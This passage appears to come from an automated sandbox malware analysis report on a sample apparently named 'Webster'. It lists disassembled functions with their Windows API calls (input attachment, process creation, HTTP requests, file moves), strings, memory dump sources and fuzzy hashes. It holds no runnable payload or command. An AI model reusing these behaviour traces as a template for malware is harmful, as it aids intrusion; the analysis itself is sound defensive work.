                                                                                  • GetParent.USER32(?), ref: 00AD9D04
                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00AD9D07
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 1536045017-1403004172
                                                                                  • Opcode ID: d020fb602625e2d311dbe3565e4c408f49d8fb87b82e2800cdf7ff0c9eca5bad
                                                                                  • Instruction ID: f247a370841d67b0fb90f1ea3f48909e1796174b22da7d939d9f908b0a5e4dbf
                                                                                  • Opcode Fuzzy Hash: d020fb602625e2d311dbe3565e4c408f49d8fb87b82e2800cdf7ff0c9eca5bad
                                                                                  • Instruction Fuzzy Hash: 3921D075E40204BFDF00ABA0CC85EFEBBB9EF94300F604016F952A32A1DF758965DA20
                                                                                  Function 00AD9D1B Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetParent.USER32 ref: 00AD9D27
                                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00AD9D3C
                                                                                  • _wcscmp.LIBCMT ref: 00AD9D4E
                                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00AD9DC9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                  • API String ID: 1704125052-3381328864
                                                                                  • Opcode ID: 8fa8534afea0323c0a63ee4e620672590a5e5cd8d3acef3463aa755b34464b04
                                                                                  • Instruction ID: 602846d95fc27d3fe08d05ff1d7ebdf5512929c3cc367e3a4f3f6d01b567e304
                                                                                  • Opcode Fuzzy Hash: 8fa8534afea0323c0a63ee4e620672590a5e5cd8d3acef3463aa755b34464b04
                                                                                  • Instruction Fuzzy Hash: FD112977248302BAFE002724EC06DE773EDDB19720F304167FA42A61E1FFA5AE515951
                                                                                  Function 00AF8F95 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VariantInit.OLEAUT32(?), ref: 00AF8FC1
                                                                                  • CoInitialize.OLE32(00000000), ref: 00AF8FEE
                                                                                  • CoUninitialize.OLE32 ref: 00AF8FF8
                                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00AF90F8
                                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00AF9225
                                                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00B13BDC), ref: 00AF9259
                                                                                  • CoGetObject.OLE32(?,00000000,00B13BDC,?), ref: 00AF927C
                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00AF928F
                                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00AF930F
                                                                                  • VariantClear.OLEAUT32(?), ref: 00AF931F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                  • String ID:
                                                                                  • API String ID: 2395222682-0
                                                                                  • Opcode ID: 80c88fc61d0f37c145037963ff4af728363e610c1478e7d7f27f2b965612fdce
                                                                                  • Instruction ID: 7aa17d8429b8a648fe287459863f3db9e709064e2e4d59c0856b1cefaaf47f17
                                                                                  • Opcode Fuzzy Hash: 80c88fc61d0f37c145037963ff4af728363e610c1478e7d7f27f2b965612fdce
                                                                                  • Instruction Fuzzy Hash: 06C13971608309AFC700EF68C884A6BB7E9FF89748F00495DF68A9B251DB71ED45CB52
                                                                                  Function 00AE19CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00AE19EF
                                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1A03
                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00AE1A0A
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1A19
                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00AE1A2B
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1A44
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1A56
                                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1A9B
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1AB0
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1ABB
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                  • String ID:
                                                                                  • API String ID: 2156557900-0
                                                                                  • Opcode ID: b86bf92fdc7729e679b368a6dca7b33fc441235eb5cf539d04630c883406b489
                                                                                  • Instruction ID: f28ed71d283426c6876d3f16e8fbe015d10f3e20a17b05f464b0d3a538d66940
                                                                                  • Opcode Fuzzy Hash: b86bf92fdc7729e679b368a6dca7b33fc441235eb5cf539d04630c883406b489
                                                                                  • Instruction Fuzzy Hash: 0231EE79611254BFEB20AF11DC88FBD37AAFB56399F908125F800C7190CFB49E848B20
                                                                                  Function 00ABC0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSysColor.USER32(00000008), ref: 00A8260D
                                                                                  • SetTextColor.GDI32(?,000000FF), ref: 00A82617
                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00A8262C
                                                                                  • GetStockObject.GDI32(00000005), ref: 00A82634
                                                                                  • GetClientRect.USER32(?), ref: 00ABC0FC
                                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 00ABC113
                                                                                  • GetWindowDC.USER32(?), ref: 00ABC11F
                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 00ABC12E
                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00ABC140
                                                                                  • GetSysColor.USER32(00000005), ref: 00ABC15E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3430376129-0
                                                                                  • Opcode ID: 53965652112e65e16fe060db4b7d515dc4a22f9cca117dd83a982178730d7582
                                                                                  • Instruction ID: 6c8ce6449cb824b1470042c96f1ee9f606bbca0ba730e6fa0b904e5e5e26206d
                                                                                  • Opcode Fuzzy Hash: 53965652112e65e16fe060db4b7d515dc4a22f9cca117dd83a982178730d7582
                                                                                  • Instruction Fuzzy Hash: 28116D31510205FFDB616FA4EC48BE97BB6EB14331F508225FA65A60E1CFB10A91EF10
                                                                                  Function 00A8AD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A8ADE1
                                                                                  • OleUninitialize.OLE32(?,00000000), ref: 00A8AE80
                                                                                  • UnregisterHotKey.USER32(?), ref: 00A8AFD7
                                                                                  • DestroyWindow.USER32(?), ref: 00AC2F64
                                                                                  • FreeLibrary.KERNEL32(?), ref: 00AC2FC9
                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AC2FF6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                  • String ID: close all
                                                                                  • API String ID: 469580280-3243417748
                                                                                  • Opcode ID: b0cf276d48b197a67e7ae36e8bbdf377f0df097a925881df2b2ed69f36b54d84
                                                                                  • Instruction ID: 4e84b5c44b242d32c18d6d673aa6f4ba811e96c8fabb4b06b7c38bc6221c013c
                                                                                  • Opcode Fuzzy Hash: b0cf276d48b197a67e7ae36e8bbdf377f0df097a925881df2b2ed69f36b54d84
                                                                                  • Instruction Fuzzy Hash: 83A16A317012228FDB29EF14C594F69F3B4BF14700F5582ADE90AAB261DB31AD52CF91
                                                                                  Function 00ADAD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • EnumChildWindows.USER32(?,00ADB13A), ref: 00ADB078
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ChildEnumWindows
                                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                  • API String ID: 3555792229-1603158881
                                                                                  • Opcode ID: 3b5ca977f8f6b7ca0891d187941ea96b96cd23ed6e396677cf026d3f1f7f67cd
                                                                                  • Instruction ID: 42ebf2e2bbff0452e6724f194638582eb8543fca84b8cf1442b5e4f1cc5bbbfc
                                                                                  • Opcode Fuzzy Hash: 3b5ca977f8f6b7ca0891d187941ea96b96cd23ed6e396677cf026d3f1f7f67cd
                                                                                  • Instruction Fuzzy Hash: 3B918471600606EACB18EF60C581BEEFBB5BF15300F64815AE85BA7391DF306959CBA1
                                                                                  Function 00A831F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 00A8327E
                                                                                    • Part of subcall function 00A8218F: GetClientRect.USER32(?,?), ref: 00A821B8
                                                                                    • Part of subcall function 00A8218F: GetWindowRect.USER32(?,?), ref: 00A821F9
                                                                                    • Part of subcall function 00A8218F: ScreenToClient.USER32(?,?), ref: 00A82221
                                                                                  • GetDC.USER32 ref: 00ABD073
                                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00ABD086
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00ABD094
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00ABD0A9
                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00ABD0B1
                                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00ABD13C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                  • String ID: U
                                                                                  • API String ID: 4009187628-3372436214
                                                                                  • Opcode ID: 705e76d7f300b65678f5ccf545791f288fc8069589672c9109595860a75657c9
                                                                                  • Instruction ID: 12e9c3be6fddc806db09ca1888516be3bf90d4f3da6a6f1f5f7b224e5444841a
                                                                                  • Opcode Fuzzy Hash: 705e76d7f300b65678f5ccf545791f288fc8069589672c9109595860a75657c9
                                                                                  • Instruction Fuzzy Hash: 5871E331404205EFCF21EF68C884AFA7BB9FF59320F144269ED565A1A6EB318D51DF60
                                                                                  Function 00B0C634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                                                    • Part of subcall function 00A82714: GetCursorPos.USER32(?), ref: 00A82727
                                                                                    • Part of subcall function 00A82714: ScreenToClient.USER32(00B477B0,?), ref: 00A82744
                                                                                    • Part of subcall function 00A82714: GetAsyncKeyState.USER32(00000001), ref: 00A82769
                                                                                    • Part of subcall function 00A82714: GetAsyncKeyState.USER32(00000002), ref: 00A82777
                                                                                  • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00B0C69C
                                                                                  • ImageList_EndDrag.COMCTL32 ref: 00B0C6A2
                                                                                  • ReleaseCapture.USER32 ref: 00B0C6A8
                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00B0C752
                                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00B0C765
                                                                                  • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00B0C847
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                  • API String ID: 1924731296-2107944366
                                                                                  • Opcode ID: 58b252f30a1ae2282aa8fba6604b32bdb4ebb04e5fc9c9a5f6d3ec83d898d7f5
                                                                                  • Instruction ID: 8e0da3b8ca6e79d8349a3b1be9509c97ce99a3c53466f0ebab2c3aa49a30e52b
                                                                                  • Opcode Fuzzy Hash: 58b252f30a1ae2282aa8fba6604b32bdb4ebb04e5fc9c9a5f6d3ec83d898d7f5
                                                                                  • Instruction Fuzzy Hash: 6C517875208305AFDB14EF24CC5AFAA7BE1FB88310F108A59F595872E1DB70AA45CB52
                                                                                  Function 00AF20E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00AF211C
                                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00AF2148
                                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00AF218A
                                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00AF219F
                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AF21AC
                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00AF21DC
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00AF2223
                                                                                    • Part of subcall function 00AF2B4F: GetLastError.KERNEL32(?,?,00AF1EE3,00000000,00000000,00000001), ref: 00AF2B64
                                                                                    • Part of subcall function 00AF2B4F: SetEvent.KERNEL32(?,?,00AF1EE3,00000000,00000000,00000001), ref: 00AF2B79
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                  • String ID:
                                                                                  • API String ID: 2603140658-3916222277
                                                                                  • Opcode ID: b77c7316d46fab3e764da8172b05c94a4a6819293e66561791fbfce1e479d355
                                                                                  • Instruction ID: f3e1b34890df35ad5364f00a2b06d4fd5855cdc4cd012026eebe75ddf55561e4
                                                                                  • Opcode Fuzzy Hash: b77c7316d46fab3e764da8172b05c94a4a6819293e66561791fbfce1e479d355
                                                                                  • Instruction Fuzzy Hash: F1415DB150121CBFEB129F90CC89FFB7BACEF08354F108116FA059A195DBB09E459BA5
                                                                                  Function 00AF9330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00B10980), ref: 00AF9412
                                                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00B10980), ref: 00AF9446
                                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00AF95C0
                                                                                  • SysFreeString.OLEAUT32(?), ref: 00AF95EA
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                  • String ID:
                                                                                  • API String ID: 560350794-0
                                                                                  • Opcode ID: f31979dedcc976b43ef01190887b1452df539ad98a61624d28a4599cc4d14679
                                                                                  • Instruction ID: afb0fce362716a52ec54aa7f5dce5a1c67cd60de56df3b29e2a76db9242eaee8
                                                                                  • Opcode Fuzzy Hash: f31979dedcc976b43ef01190887b1452df539ad98a61624d28a4599cc4d14679
                                                                                  • Instruction Fuzzy Hash: 25F12B71A00219EFDB15EF94C884EBEB7B9FF49315F108158FA06AB261DB31AE45CB50
                                                                                  Function 00AFFD7D Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00AFFD9E
                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00AFFF31
                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00AFFF55
                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00AFFF95
                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00AFFFB7
                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B00133
                                                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00B00165
                                                                                  • CloseHandle.KERNEL32(?), ref: 00B00194
                                                                                  • CloseHandle.KERNEL32(?), ref: 00B0020B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                  • String ID:
                                                                                  • API String ID: 4090791747-0
                                                                                  • Opcode ID: 13b89eaa815993d4577c9fed8fab2e6135650c0c0549f4cb7224b5c1a62cf4d0
                                                                                  • Instruction ID: 88e72ec6e47dab7ce5a0dc4e8a0b0bb58dafe8c1db4d6f329e917895a560cbbc
                                                                                  • Opcode Fuzzy Hash: 13b89eaa815993d4577c9fed8fab2e6135650c0c0549f4cb7224b5c1a62cf4d0
                                                                                  • Instruction Fuzzy Hash: 51E1BE312043459FCB24EF24C991B6EBBE1EF89314F14856DF9999B2A2DB31EC41CB52
                                                                                  Function 00AE527C Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00AE4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AE3B8A,?), ref: 00AE4BE0
                                                                                    • Part of subcall function 00AE4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00AE3B8A,?), ref: 00AE4BF9
                                                                                    • Part of subcall function 00AE4FEC: GetFileAttributesW.KERNEL32(?,00AE3BFE), ref: 00AE4FED
                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00AE52FB
                                                                                  • _wcscmp.LIBCMT ref: 00AE5315
                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00AE5330
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                  • String ID:
                                                                                  • API String ID: 793581249-0
